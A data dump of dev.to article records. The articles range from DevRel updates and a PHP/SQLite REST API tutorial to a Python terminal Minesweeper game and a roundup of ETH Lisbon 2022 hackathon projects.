1,243,859 | This Week in DevRel: Life Moves Fast | This post is more of a DevRel, Technical Community Builder highlight reel; I plan on writing a reflection on how I plan on building time into looking around more than once in a while later in the month. | 19,583 | 2022-11-04T22:29:50 | https://dev.to/bekahhw/this-week-in-devrel-life-moves-fast-5gfc | devrel, codenewbie, career | ---
title: This Week in DevRel: Life Moves Fast
published: true
description: This post is more of a DevRel, Technical Community Builder highlight reel; I plan on writing a reflection on how I plan on building time into looking around more than once in a while later in the month.
tags: devrel, codenewbie, career
series: Technical Community Building
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2022-11-04 22:26 +0000
---
Well, my "This Week in DevRel" series has turned into this “couple of months” in DevRel. In the words of Ferris Bueller, “Life moves pretty fast. If you don't stop and look around once in a while, you could miss it.” And I feel like a lot of the last two months, I’ve been moving fast and not taking the time to look around. I’m working on it. This post is more of a highlight reel; I plan on writing a reflection on how I plan on building time into looking around more than once in a while later in the month.
## Highlights
### Conferences
I was lucky enough to have the opportunity to give my talk [Does your Org Need a Community](https://www.youtube.com/watch?v=zoo0B7GFvo8) at [MagnoliaJS](https://www.magnoliajs.com/) this year and to attend [Momentum Conf](https://momentumdevcon.com/).
I did a lot of learning at these conferences. Some of it was when I was listening to talks, including one on community and one on burnout. Some of it was talking to other people in the field. I gravitate towards people who are doing some type of community building, whether or not that’s in their job description. Having these conversations helps me to get a pulse on the wider tech community, bounce ideas off of community professionals, and explore new ideas and initiatives.
### Hacktoberfest
It’s my favorite time of the year! This year I participated as a mentor, contributor, and maintainer. I got to work on my postpartum wellness app with others and launch a new Deepgram project as a maintainer that I really enjoyed working on. It’s a chrome extension that allows the user to get transcripts in a browser tab, and we’re working on functionality to have translation available as well. I plan on keeping this going as long as the ideas are flowing and folks find it helpful. If you want to check it out, here’s the [GitHub repo](https://github.com/deepgram-devs/dg-translation-chrome-ext). I also supported the [Virtual Coffee](https://virtualcoffee.io/) Hacktoberfest Initiative. If you want to read more about that, check out [Dan Ott’s post](https://dev.to/virtualcoffee/virtual-coffee-hacktoberfest-2022-roundup-1c2k).
### Livestreams
I did THREE in October! I did some TypeScript on Virtual Coffee’s [TypeScript Tuesday Twitch Stream](https://www.twitch.tv/virtualcoffeeio). I was also a guest on Mia Moore’s stream where we talked about all things open source, and I also did a [Project Showcase stream with Appwrite](https://www.youtube.com/watch?v=PMQb5qN5ob8), where we walked through Deepgram open source projects and talked about some of the ways we try to make our repos contributor friendly.
### Blogging
Unfortunately, I haven’t been able to have the cadence I want with blogging, but I did get a couple of posts in, including this one on [Open Source Projects for Hacktoberfest](https://dev.to/deepgram/open-source-projects-for-hacktoberfest-2022-4cia), yesterday’s [post on imposter syndrome](https://t.co/rkob8LcmsO) and a new one on [5 Reasons to Contribute to Open Source Projects](https://blog.deepgram.com/5-reasons-to-keep-contributing-to-open-source-projects/). The good news is, our monthly challenge for Virtual Coffee is [Let’s Write 100k words together!](https://virtualcoffee.io/monthlychallenges/nov-2022), so you’ll be reading a lot more from me this month.
### Hackathon
We ran a hackathon internally with the Learn Build Teach Community. We provided support, ran a couple of workshops, and are in the judging stages. This is the first time we ran an internal community hackathon, so this was a real learning experience. As part of the post-hackathon experience, we’re evaluating what worked and what didn’t, and what our strategy will be going forward.
### Twitter Spaces
I’m back on the Twitter Space game! I’m running them through the [@DeepgramAI](https://twitter.com/DeepgramAI) Twitter account. I’ve been doing them most Wednesdays at 1pm ET. So if you’re not following us, you might want to. Another option is to check out our [Events discussion](https://github.com/orgs/deepgram/discussions/categories/events) in our Community Forum where I’m posting our spaces at least a week in advance. If you have questions or comments before the space, feel free to drop them in there and we’ll talk about it on the space.
I think this is a pretty good overview of the things that I work on as a technical community builder. Oh, and one last achievement I want to share. I received one of the Twilio spotlight awards. If you want to know more about it and me, you can check out [the Business Insider article](https://www.businessinsider.com/sc/meet-the-inspirational-leaders-creating-a-better-future-for-developers?utm_campaign=devsearchlight2022_reveal&utm_source=twitter&utm_medium=twiliodevs) Being a Technical Community Builder requires a lot of pivoting, versatility, and getting outside of my comfort zone. But if I wasn’t spending time getting out of my comfort zone, then it wouldn’t be that fun, would it? | bekahhw |
1,244,285 | Data is Everything! | We live in a world where "data" is given more priority than others 🙄, and that's a fact 😎! No one... | 0 | 2022-11-05T10:32:52 | https://dev.to/aniketsingh98571/data-is-everything-1mhp | bigdata, statistic, analytics, marketing | We live in a world where "data" is given more priority than others 🙄, and that's a fact 😎! No one wanted to share about "what they are doing", "where they were last night," etc. just because of privacy reasons 😤. Isn't data privacy something that everyone should understand? 🤔 And what will happen if we lose it? "If we are connected to the internet, then we start to lose our privacy," said one of the senior developers.
The major source of income for big tech giants like Google, Amazon, Meta, etc. comes from our data alone. Curious to know how? Continue reading below 🙂. So far we have been discussing "data" and "data privacy"; let's decode both.
## What is data?
Data is a collection of raw, unorganized facts and details like text, observations, figures, symbols, images and descriptions of things, etc.
## What is data privacy?
Data privacy generally means the ability of a person to determine for themselves when, how, and to what extent personal information about them is shared with or communicated to others.
Do you have any idea how data was handled in the web1 world, where all of these things were not happening? Check it out.
## What is web1?
1. Web1 was introduced when the internet was born. At that time the main purpose of websites was to show static content in the form of blogs, newsletters, and articles.
2. All the websites were internally linked using hyperlinks.
Since there were no user interactions with the websites, the businesses used less data overall. "No user interactions" in this context refers to the inability of users to add data to websites, give reviews on items, or express their likes. In a nutshell, we may state that "data privacy was the center of the Web1 universe" 😉.
The big picture of Data Privacy comes in the web2 world.
## What is web2?
1. Web2 was introduced in order to bring interactiveness to websites and also users can perform certain actions.
2. Big tech giants like Google, Amazon, Microsoft, etc are currently ruling the web2 world.
Social networking platforms like Instagram and Twitter and e-commerce websites like Amazon and Flipkart spring to mind when we talk about web2. Every day, these business servers receive millions of Terabytes of data uploads.
### What actual data gets uploaded to their servers 🤔 ?
1. The servers of Twitter and Instagram save your photographs, comments, likes, dislikes, messages, and a variety of other things.
2. The servers of Flipkart and Amazon save your reviews, ratings, purchases, and many other things.
More than 300 million photos get uploaded per day. Every minute there are 510,000 comments posted and 293,000 statuses updated.
#### Well, did I tell you that they track your web activity too 🤨? How?
Suppose you've decided to get some sneakers from Amazon: you head there, look for a pair, and buy it. Now, when you start searching for anything else, Google suggests sneakers from a different brand. This is nothing more than machine learning algorithms making use of information from your web browsing.
#### Is data that important to a company?
Indeed, from a business standpoint, companies are interested in learning things like "Are people content with our product?", "Which product is trending on our platform?", "What reviews are linked to a product?", etc.
There are several businesses that utilize user data for marketing, financial, and healthcare analysis.
### Future of Data - Alternative data 😎!
#### What is Alternative Data?
Alternative data is defined as non-traditional data that can provide an indication of future performance of a company outside of traditional sources, such as company filings, broker forecasts, and management guidance.
Want to know more about alternative data 😄?
Check out [Proxycurl](https://nubela.co/blog/the-ultimate-guide-to-alternative-data-what-is-it-really/) now!
| aniketsingh98571 |
1,268,936 | New Product Launch "fastdbaccess" | Just Launched a new product called fastdbaccess. | 0 | 2022-11-23T14:01:15 | https://dev.to/lmas3009/new-product-launch-fastdbaccess-3hj5 | developer, mongodb, nextjs, developertools | ---
title: New Product Launch "fastdbaccess"
published: true
description: Just Launched a new product called fastdbaccess.
tags: developer, mongodb, nextjs, developertools
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t6u5ow3rc7euawt9ekeb.gif
---

Intro Video
{% embed https://youtu.be/2cSPbRUjoPE %}
Try the product and share your feedback.
A Detailed step-by-step video coming out soon...
Get updates on https://www.producthunt.com/posts/fastdbaccess
| lmas3009 |
1,269,491 | How to Use antd upload with Form.Item and Form.List ,finally get uploaded filePath when Form onFinish? | How to Use antd upload with Form.Item and... | 0 | 2022-11-23T20:57:09 | https://dev.to/alaakassemsenousy/how-to-use-antd-upload-with-formitem-and-formlist-finally-get-uploaded-filepath-when-form-onfinish-48i0 | {% stackoverflow 74547021 %} | alaakassemsenousy | |
1,269,775 | REST API with PHP and SQLite // Case Study Android Note App | Hola! In this tutorial, we will create a database that can be connected with... | 0 | 2022-11-24T12:21:13 | https://dev.to/ayatullahmaarif/rest-api-with-php-and-sqlite-case-study-android-note-app-3emp | rest, php, sqlite, android |
## Hola!
In this tutorial, we will create a database that can be connected to an Android Studio project. My case study this time is a note app.
## PHP
The first step is creating the project folder; it must be placed in XAMPP's htdocs directory `C:\xampp\htdocs`. I named my folder NOTEmplate. Then create a PHP file; here I named it index.php.
In index.php, create a variable holding the database file name; then, using PDO, we can execute the creation of that database file. For error handling we can use try & catch, and inside the try block we will also create the tables using SQLite SQL from PHP.
```php
$file_db = "notemplate.db";
try{
$pdo = new PDO("sqlite:$file_db");
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
// akun (account) table
$sql_create = "CREATE TABLE IF NOT EXISTS 'akun'(
'id_akun' INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
'username' TEXT NOT NULL,
'password' TEXT NOT NULL)";
$pdo->exec($sql_create);
// konten (content) table
$sql_create = "CREATE TABLE IF NOT EXISTS 'konten'(
'id_konten' INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
'judul' TEXT NOT NULL,
'konten' TEXT NOT NULL,
'created_at' DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP)";
$pdo->exec($sql_create);
}
catch(PDOException $e){
throw new PDOException($e->getMessage(),(int)$e->getCode());
}
```
Here I created two tables: akun (account) and konten (content). Each table needs methods in order to operate.
The **methods** I created here are:
`GET` to fetch data from the server
`POST` to insert new data
`DELETE` to delete data
**Additional**: If the consumer of the API is a machine, you must add `header('Content-Type: application/json');`. By default the application uses JSON, but if the consumer is a human, this can be skipped.
```php
// akun table methods
if($_SERVER['REQUEST_METHOD'] === 'GET'){
$query = 'SELECT * FROM akun ORDER BY id_akun ASC';
$stmt = $pdo->prepare($query);
$stmt->execute();
$data = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo json_encode($data);
}
else if($_SERVER['REQUEST_METHOD'] === 'POST'){
if($_POST['username']!="" && $_POST['password']!="" ){
$username = $_POST['username'];
$password = $_POST['password'];
$query = "INSERT INTO akun (username, password) VALUES (?,?)";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$username, $password]);
if($res){
$data = ['username'=>$username, 'password'=>$password];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
else if($_SERVER['REQUEST_METHOD'] === 'DELETE'){
if($_GET['id_akun'] != ''){
$id_akun = $_GET['id_akun'];
$query = "DELETE FROM akun WHERE id_akun = ?";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$id_akun]);
if($res){
$data = ['id_akun'=>$id_akun];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
// konten table methods
if($_SERVER['REQUEST_METHOD'] === 'GET'){
$query = 'SELECT * FROM konten ORDER BY created_at DESC';
$stmt = $pdo->prepare($query);
$stmt->execute();
$data = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo json_encode($data);
}
else if($_SERVER['REQUEST_METHOD'] === 'POST'){
if($_POST['judul']!="" && $_POST['konten']!="" ){
$judul = $_POST['judul'];
$konten = $_POST['konten'];
$query = "INSERT INTO konten (judul, konten) VALUES (?,?)";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$judul, $konten]);
if($res){
$data = ['judul'=>$judul, 'konten'=>$konten];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
else if($_SERVER['REQUEST_METHOD'] === 'DELETE'){
if($_GET['id_konten'] != ''){
$id_konten = $_GET['id_konten'];
$query = "DELETE FROM konten WHERE id_konten = ?";
$stmt = $pdo->prepare($query);
$res = $stmt->execute([$id_konten]);
if($res){
$data = ['id_konten'=>$id_konten];
echo json_encode($data);
}else{
echo json_encode(['error'=>$stmt->errorCode()]);
}
}
}
```
## POSTMAN
To exercise the methods above we cannot use an ordinary browser; we need a dedicated application, namely **Postman**. Before we open Postman, first start Apache in XAMPP.

Open Postman and create a new tab. In the URL field, enter `localhost/(folder inside htdocs)/(PHP file name)`; that is the default. If you modified the port, include it as well: `localhost:(port)/.../...`. My URL here is `localhost/NOTEmplate/index.php`.
**GET** => select GET to the left of the URL, then Send.

As you can see at the bottom, the output is two empty brackets, one for each table.
The database file should have been created after you pressed Send; the file can be found in the htdocs folder, and its name should match the file_db variable we initialized in index.php.

**POST** => select POST to the left of the URL. We must first fill in the keys and values: choose Body (below the URL), then form-data (below Body).

As you can see at the bottom, the data has been inserted. We can view the whole table contents with GET.

If you want to fill only one of the tables, that is actually possible, but there will be a warning; that is not a problem, the data will still be inserted.


**DELETE** => select DELETE to the left of the URL. We must provide the id of the row to delete: choose Params (below the URL). Enter the id column name of the table you want to delete from; here I will delete from the konten table, and I will delete the row with id 2.

There will be a warning because we did not fill in the id_akun column, but that is not a problem; the row will still be deleted. To see the remaining data, use the GET method.

You can also check using sqliteonline.com by uploading the database file (from the XAMPP htdocs folder); use a `SELECT` statement to view the data.

## THANKS
Thanks for your attention; feel free to ask in the comments. Good luck ☺
| ayatullahmaarif |
1,269,816 | Link Analyzer Tool - Website Link checker | You can track all Do-Follow, No-Follow, internal and external links on your website, on a particular... | 0 | 2022-11-24T03:19:19 | https://dev.to/mya2zseo/link-analyzer-tool-website-link-checker-9oo | <p>You can track all Do-Follow, No-Follow, internal and external links on your website, on a particular page with the help of our “Link Analyzer Tool”.</p>
<h3>Link Analyzer Tool</h3>
<p>You should analyze links on your website, it can help you to reduce spam score. Link Analyzer Tool by mya2zseo.com is made to show you the authentic result.</p>
<p>If you are preparing your website for the latest penguin update of Google search algorithm, or you are conducting a casual audit, our free link checker SEO tool can meet all your requirements. This utility tool effortlessly analyzes and reviews your website links.</p>
<p><img alt="Analyze website links" class="responsivejpg" src="https://mya2zseo.com/uploads/link-analyzer.jpg" style="width: 854px; height: 387px;" />You can check one link or URL or webpage at a time with our link tester tool. If you try to audit deeply, you can check all the links one by one, including the home page.</p>
[Read More ->](https://mya2zseo.com/link-analyzer-tool) | mya2zseo | |
1,270,025 | Python Terminal Game: Minesweeper | As a part of the codecademy course on Computer Science I came up with this approach to code the game... | 0 | 2022-11-24T04:31:36 | https://dev.to/ftapiaa27/python-terminal-game-minesweeper-4bn8 | python, computerscience, gamedev, beginners | As a part of the codecademy course on Computer Science I came up with this approach to code the game "Minesweeper" as a game interactible through the terminal.
## The Game class
```python
import random


class Game:
    alive = 1
    board_back = [[" " for i in range(9)] for j in range(9)]
    board_front = [["#" for i in range(9)] for j in range(9)]
    bomb_coor = []

    def __init__(self):
        x_coor = [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8]
        y_coor = [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8]
        for i in range(10):
            temp = []
            # pop at a random index (random.choice returns a value, not an
            # index, so randrange over the current length is used instead)
            temp.append(x_coor.pop(random.randrange(len(x_coor))))
            temp.append(y_coor.pop(random.randrange(len(y_coor))))
            self.bomb_coor.append(temp)
            self.board_back[temp[0]][temp[1]] = "B"
        for i in range(9):
            for j in range(9):
                if self.board_back[i][j] == "B":
                    continue
                else:
                    self.board_back[i][j] = str(self.count_bombs(i, j))

    def count_bombs(self, x, y):
        count = 0
        for i in range(x - 1, x + 2):
            for j in range(y - 1, y + 2):
                if i == x and j == y:
                    continue
                elif i < 0 or i > 8 or j < 0 or j > 8:
                    continue
                elif self.board_back[i][j] == "B":
                    count += 1
                else:
                    continue
        return count

    def print_board(self, board):
        for i in range(9):
            print(board[i])

    def set_flag(self):
        x = int(input("Type horizontal coordinate to flag: "))
        y = int(input("Type vertical coordinate to flag: "))
        self.board_front[y][x] = "F"

    def uncover(self):
        x = int(input("Type horizontal coordinate to uncover: "))
        y = int(input("Type vertical coordinate to uncover: "))
        if self.board_back[y][x] == "0":
            self.clear_empty(y, x)
        else:
            self.board_front[y][x] = self.board_back[y][x]
            if self.board_back[y][x] == "B":
                print("You lost")
                self.alive = 0

    def clear_empty(self, x, y):
        if self.board_front[x][y] != " " and self.board_back[x][y] == "0":
            self.board_front[x][y] = " "
            for i in range(y - 1, y + 2, 2):
                if i < 0 or i > 8:
                    continue
                self.clear_empty(x, i)
            for j in range(x - 1, x + 2, 2):
                if j < 0 or j > 8:
                    continue
                self.clear_empty(j, y)

    def verify_game(self):
        if self.alive == 0:
            print("Game Over")
            return 0
        else:
            user_wins = True
            for i in self.bomb_coor:
                if self.board_front[i[0]][i[1]] != "F":
                    user_wins = False
                    break
            for i in self.board_front:
                if "#" in i:
                    user_wins = False
                    break
            if user_wins:
                print("You Won!")
                return 0
            else:
                return 1
```
This class contains 4 attributes and 7 methods.
THE ATTRIBUTES
1. alive: indicates whether the player is alive or dead.
2. board_back: not visible to the player; a 9x9 matrix (list of 9 lists of 9 values), the board containing all the info, including bomb locations and the number of bombs in surrounding squares.
3. board_front: visible to the player; "#" means the square hasn't been uncovered.
4. bomb_coor: a list of coordinate pairs indicating the locations of all bombs.
THE METHODS
1. `__init__`: the class constructor; fills the bomb_coor list and sets up the board_back matrix.
2. count_bombs: used in the constructor to count the number of bombs surrounding a given square, assuming the square itself doesn't hold a bomb.
3. print_board: prints a board in the terminal.
4. set_flag: "flags" a square in board_front when we believe it holds a bomb.
5. uncover: uncovers an obscured square in board_front and reveals its corresponding value from board_back.
6. clear_empty: clears all contiguous squares in board_front that correspond to a "0" in board_back.
7. verify_game: checks whether the game is still going or has ended in a win or a loss.
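As a quick sanity check, the neighbor-counting idea behind count_bombs can be exercised as a standalone function. This is a minimal sketch independent of the Game class; the function name and the 3x3 demo board are mine, not from the project:

```python
# Standalone sketch of the neighbor-counting logic: count the "B" cells
# in the 3x3 neighborhood around (x, y), skipping the square itself.
def count_adjacent_bombs(board, x, y):
    count = 0
    for i in range(x - 1, x + 2):
        for j in range(y - 1, y + 2):
            if (i, j) == (x, y):
                continue  # don't count the square we're inspecting
            if 0 <= i < len(board) and 0 <= j < len(board[0]):
                if board[i][j] == "B":
                    count += 1
    return count

# Tiny 3x3 board with bombs in two corners.
demo = [[" "] * 3 for _ in range(3)]
demo[0][0] = "B"
demo[2][2] = "B"
print(count_adjacent_bombs(demo, 1, 1))  # → 2 (both bombs touch the center)
print(count_adjacent_bombs(demo, 0, 1))  # → 1 (only the top-left bomb)
```

The bounds check here uses chained comparisons instead of the four explicit `< 0` / `> 8` tests, but the result is the same.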
Example of object usage:
```python
game = Game()
while game.alive:
    game.print_board(game.board_back)
    print()
    game.print_board(game.board_front)
    if game.verify_game() == 0:
        break
    choice = int(input("""
Select one option:
1.- Flag
2.- Uncover
"""))
    if choice == 1:
        game.set_flag()
    else:
        game.uncover()
```
Code on github: https://github.com/ftapiaa27/MineSweeper.git
CONCLUSION:
This little project serves as general practice of OOP in Python; it's not much, but it's honest work. | ftapiaa27 |
1,270,047 | Challenges on Day 1 | On the very first day when I started coding, I faced lots of difficulties although I'm from a Computer Science background. I started coding after... | 0 | 2022-11-24T05:56:48 | https://dev.to/kunalsamanta/challenges-on-day-1-o0a | On the very first day when I started coding, I faced lots of difficulties, although I'm from a Computer Science background. I started coding after getting my degree from college. Whenever I opened my laptop and started to code, I couldn't understand what was going on. Then, after receiving some input from my friends and researching on the internet, I could understand the end result for a particular problem statement but was unable to conceptualize the solution, and that led me to leaving those problems in between and never returning to them. Even if I was able to get a few things correct, the constant nudge of warnings and errors demotivated me quite often. | kunalsamanta |
1,270,477 | The best projects from ETH Lisbon 2022 | One of the best ETH events in 2022, ETH Lisbon, took place from the 28th to the 30th of October. This... | 0 | 2022-11-24T11:45:41 | https://dev.to/taikai/the-best-projects-from-eth-lisbon-2022-16c3 | eth, ethlisbon, hackathon, developers | One of the best ETH events in 2022, ETH Lisbon, took place from the 28th to the 30th of October. This Ethereum-focused hackathon had over 330 participants and 97 projects delivered using TAIKAI’s hackathon platform.
This large number of developers did not happen by chance. In addition to the opportunity to create innovative projects, the total prize pool was $20,000, with the best 10 projects earning $2,000 each.
There were also sponsor bounties worth up to $118,500!
In order to compete for these prizes, participants teamed up using TAIKAI’s matchmaking system, resulting in 97 delivered projects that were evaluated by 13 judges.
We’ve analyzed the projects and compiled a list of the best ones, divided by categories.

## The best DAO and DeFi projects from ETH Lisbon
### [Lekker Finance](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tpj350446301zcoiepyje5/idea)
Before we get into the details of this project, which was named one of the top ten hackathon projects at ETH Lisbon, it's important to understand that it uses the Euler Protocol, an Ethereum-based non-custodial DeFi (Decentralized Finance) protocol that allows users to lend and borrow almost any crypto asset.
This is important to understand because the Lekker Finance project's goal is to allow users to enter leveraged positions via Euler.
The system built at the hackathon works as follows: positions can be opened in a single transaction using flash swaps, making the process easier for the end user. It's no coincidence that the project’s slogan is Leverage Made Simple.
Typically, in order to obtain leverage, users must execute multiple loan-swap-loan transactions, resulting in a complex manual process and high fees.
Also, this makes loans and investments more difficult to trace and exit.

With Lekker Finance, interest rates are reduced by simplifying the process on a single transaction, as opposed to what happens in centralized exchanges, for example.
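To see why a single transaction matters, it helps to quantify the manual alternative. Looping deposit → borrow → swap → deposit at a fixed loan-to-value (LTV) ratio is a geometric series whose total exposure converges on 1 / (1 − LTV) times the initial deposit. A back-of-the-envelope sketch — the numbers are illustrative, not Euler's actual parameters:

```javascript
// Total exposure after repeatedly looping deposit -> borrow -> swap -> deposit
// at a fixed loan-to-value ratio. Each loop adds ltv^n of the initial deposit,
// so exposure converges on the geometric-series limit deposit / (1 - ltv).
function loopedExposure(deposit, ltv, loops) {
  let exposure = 0;
  let next = deposit;
  for (let i = 0; i <= loops; i++) {
    exposure += next; // deposit the current tranche
    next *= ltv;      // borrow against it for the next loop
  }
  return exposure;
}

function maxLeverage(ltv) {
  return 1 / (1 - ltv); // limit of the series above
}

console.log(loopedExposure(100, 0.8, 20).toFixed(2)); // approaches 500
console.log(maxLeverage(0.5)); // 2
```

Each of those manual loops is a separate on-chain transaction with its own fees, which is exactly the overhead a single flash-swap transaction avoids.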
### [GlacierDAO](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9uk7sb335995101tp0k0duqhn/idea)
Elected as one of the Top 10 hackathon projects of ETH Lisbon, GlacierDAO has proposed a Decentralized Autonomous Organization that preserves open-source code as a public good.
The project's authors argue that code, like data, should be preserved in a censorship-resistant manner.
The concept arose after some developers complained that their GitHub accounts had been suspended for writing Tornado Cash code.
To clarify, Tornado Cash works as a token mixer, used to shuffle transactions in a way that makes tracking difficult on public blockchains like Ethereum.
To ensure the preservation of open source, GlacierDAO conducts a call for funds every quarter. Individuals donate funds to cover the costs of preserving codes in exchange for NFTs.

On the other hand, a call for URLs is issued at the same time, which means that individuals can submit URLs to code repositories that they believe are valuable.
URLs are placed on a list for those who contributed funds to vote on whether the code should be preserved.
The funds raised will then be used to ensure the code's preservation on the FileCoin Network, an open-source peer-to-peer network that stores files, protocols, and incentive layers. In other words, users pay storage providers to store their files and this payment is made through investors in the GlacierDAO strategy.
### [BibliothecaDAO - Realms Assassins](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9ubhjnm5143601tau5fipokn/idea)
Bibliotheca DAO is a web3 game development studio that creates on-chain games for StarkNet, a permissionless decentralized Validity-Rollup (also known as a "ZK-Rollup").
A team from Bibliotheca DAO developed a solution on ETH Lisbon to hide one player's information and expose it only when other players meet on-chain conditions.
They accomplished this through the use of a trusted 'dungeon master' (third party) that stores private information to enable multiplayer on-chain games, achieving hidden information on-chain without a ZK hashing construction.
To get it done, they used the game Realms Assassins – Fog of War as an example. The project was also one of the 10 hackathon winners presented on ETH Lisbon.
## The best crypto wallet projects
### [Archive the Web](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9v5bl03100766701ttowv62zoz/idea)
This project was also named one of the hackathon's top ten projects and won first place in the Wallet Connect best public good bounty.
The idea was to create an automatic website archiving system based on web3 protocols that could be paid for with a variety of crypto assets, acting as a decentralized backup of the world wide web.
The "Archive the Web" system enables users to automate website archiving on the Arweave decentralized protocol at predetermined intervals (for example, every 60 minutes) for an approximate duration (for example, 365 days) and pay for data storage with ETH, ERC-20, or AR.
It means that users can permanently and automatically save information, apps, and other content (such as images or web apps), preventing data published on the internet from being lost, as happens in many cases every day.

To achieve this, the Archive the Web team created a custom Metamask and a WalletConnect button that allows direct interaction with Arweave and uses the arp Ethereum signer to interact with Smartweave contracts via ETH/ERC20 wallets.
### [WalletConnect meets Self-Sovereign Identity](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9v7ejkf118071801ttd82tmgx3/idea)
Winner of the Wallet Connect Best Mobile UX bounty, this project extends the WalletConnect V2 protocol stack to enable Self-Sovereign Identity (SSI), exchanging Decentralized Identifiers and W3C Verifiable Credentials in a secure, privacy-respecting, and user-friendly manner.
But don’t take our word for it.
### [Testamint](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tzyn7h29729001z2ukofazna/idea)
Testamint, one of the zkSync bounty winners, is a social recovery mobile dApp project that uses zkSync account abstraction to allow account recovery by a group of trusted people after a predetermined interval of inactivity.
It specifically addresses three issues: lost keys, lost passphrases, and death. Yes, that's right: if a cryptocurrency holder passes away, family members can recover it using this dApp.
The solution connects wallets through Wallet Connect and allows users to create a list of family members, set up periodic reminders to prove the user is still alive, and record a video testimonial that will be delivered to family members if the user fails to prove he or she is still alive.
Furthermore, the solution provides the user with the "still here" button to complete a transaction and prove the user is still alive.
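The liveness logic this flow relies on can be sketched in a few lines — the names and the thirty-day interval below are placeholders; the real dApp enforces this on-chain via zkSync account abstraction:

```javascript
// Returns true when the owner has failed to prove liveness within the
// agreed interval, i.e. when recovery by the trusted group may begin.
function recoveryUnlocked(lastProofTimestamp, intervalMs, now = Date.now()) {
  return now - lastProofTimestamp > intervalMs;
}

// Pressing the "still here" button simply refreshes the timestamp.
function stillHere() {
  return Date.now();
}

const THIRTY_DAYS = 30 * 24 * 60 * 60 * 1000;
const lastProof = Date.now() - 31 * 24 * 60 * 60 * 1000; // last proof 31 days ago
console.log(recoveryUnlocked(lastProof, THIRTY_DAYS)); // true
```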
## The best dApps and smart contract projects
### [Smart What?!](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9slqpm144092101zc25lw0c5j/idea)
During ETH Lisbon, this project, which promised to be a Google Translator for Smart Contracts, was rewarded in the Wallet Connect - Best Mobile UX bounty category.
The idea was to help web2 users understand smart contracts better by "translating" smart contract contents. The goal is to make smart contracts and the web3 world more accessible by providing a thorough understanding of the content.
The mechanism is quite straightforward. Users only need to paste a smart contract URL to get a full translation that anyone with web2 code/math knowledge can understand.
Then, it is possible to save these translations or use Wallet Connect to upload them on Filecoins IPFS.
This tool can also be used by auditing firms to review smart contracts. It saves time and allows less experienced team members to get an audit started.
You can test it right now by entering the URL of your smart contract on the Smart What website.

### [SafeCheck](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9solpi758359001z2qgxiqtrl/idea)
This fantastic tool was one of the top ten winners of the ETH Lisbon hackathon. The team's concept was to design a solution that could provide users with information about the outcome of transactions and the addresses they are interacting with, before sending transactions.
In other words, users can analyze smart contract data and transactions before signing them.
SafeCheck can be added as an extension to MetaMask accounts or used directly on the web app by entering a smart contract number and letting SafeCheck inspect it. Additionally, transaction calls can be simulated directly from the web app.
Here's a sample of the SafeCheck web app interface:

And here is how it works when connected with MetaMask:

### [Trust score snap](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9u0bpxr31220901vt9704zkbr/idea)
This intriguing project was chosen as one of the top ten projects from the ETH Lisbon hackathon. The idea is to show color flags that indicate how safe it is to interact with specific smart contracts: green (safe to use), orange (warning), and red (dangerous).
It acts as a MetaMask Snap extension that reads and categorizes smart contracts based on a security suspicion standard determined by Trust Score.
The project's authors intended to provide users with non-technical information using a simple way to determine whether a smart contract is safe to interact with.
The system automatically analyzes quantitative and qualitative data about a smart contract, such as its popularity (how many people have interacted with it), time of existence (contract age/antiquity), frequency (recent number of interactions), repetition (how many times each user has interacted with the contract), and so on.
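Reduced to code, the idea looks something like the sketch below — the weights, caps, and thresholds are assumptions made up for this example; the write-up does not disclose Trust Score's actual model:

```javascript
// Toy trust score: combines the signals listed above into a 0–100 score and
// maps it to a flag colour. Weights and thresholds are invented for illustration.
function trustScore({ uniqueUsers, ageDays, recentTxCount, repeatUserRatio }) {
  const popularity = Math.min(uniqueUsers / 10000, 1); // how many interacted
  const maturity = Math.min(ageDays / 365, 1);         // contract age
  const activity = Math.min(recentTxCount / 1000, 1);  // recent interactions
  const loyalty = Math.min(Math.max(repeatUserRatio, 0), 1); // repeat usage
  return Math.round(
    100 * (0.35 * popularity + 0.25 * maturity + 0.2 * activity + 0.2 * loyalty)
  );
}

function flag(score) {
  if (score >= 70) return "green";  // safe to use
  if (score >= 40) return "orange"; // warning
  return "red";                     // dangerous
}

const score = trustScore({
  uniqueUsers: 50000, ageDays: 730, recentTxCount: 5000, repeatUserRatio: 0.6
});
console.log(score, flag(score)); // → 92 green
```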
Here’s an example analysis:

## Honorable Mentions
Overall, the ETH Lisbon hackathon had some pretty amazing projects!
Curating this list was a tough task too. In total, 97 incredible projects were delivered but it would be too much information to include them all here.
However, to provide a better overview of the event, we compiled a list of "honorable mentions", which is comprised of a handful of projects that caught our attention.

### [Zilly](https://taikai.network/ethlisbon/hackathons/ethlisbon-2022/projects/cl9tzophr28518901vtvuvcqrt6/idea)
This creative idea was rewarded as one of ETH Lisbon's best projects. The Zilly project proposes an embeddable widget for developing Web3 membership programs that increase brand engagement and loyalty.
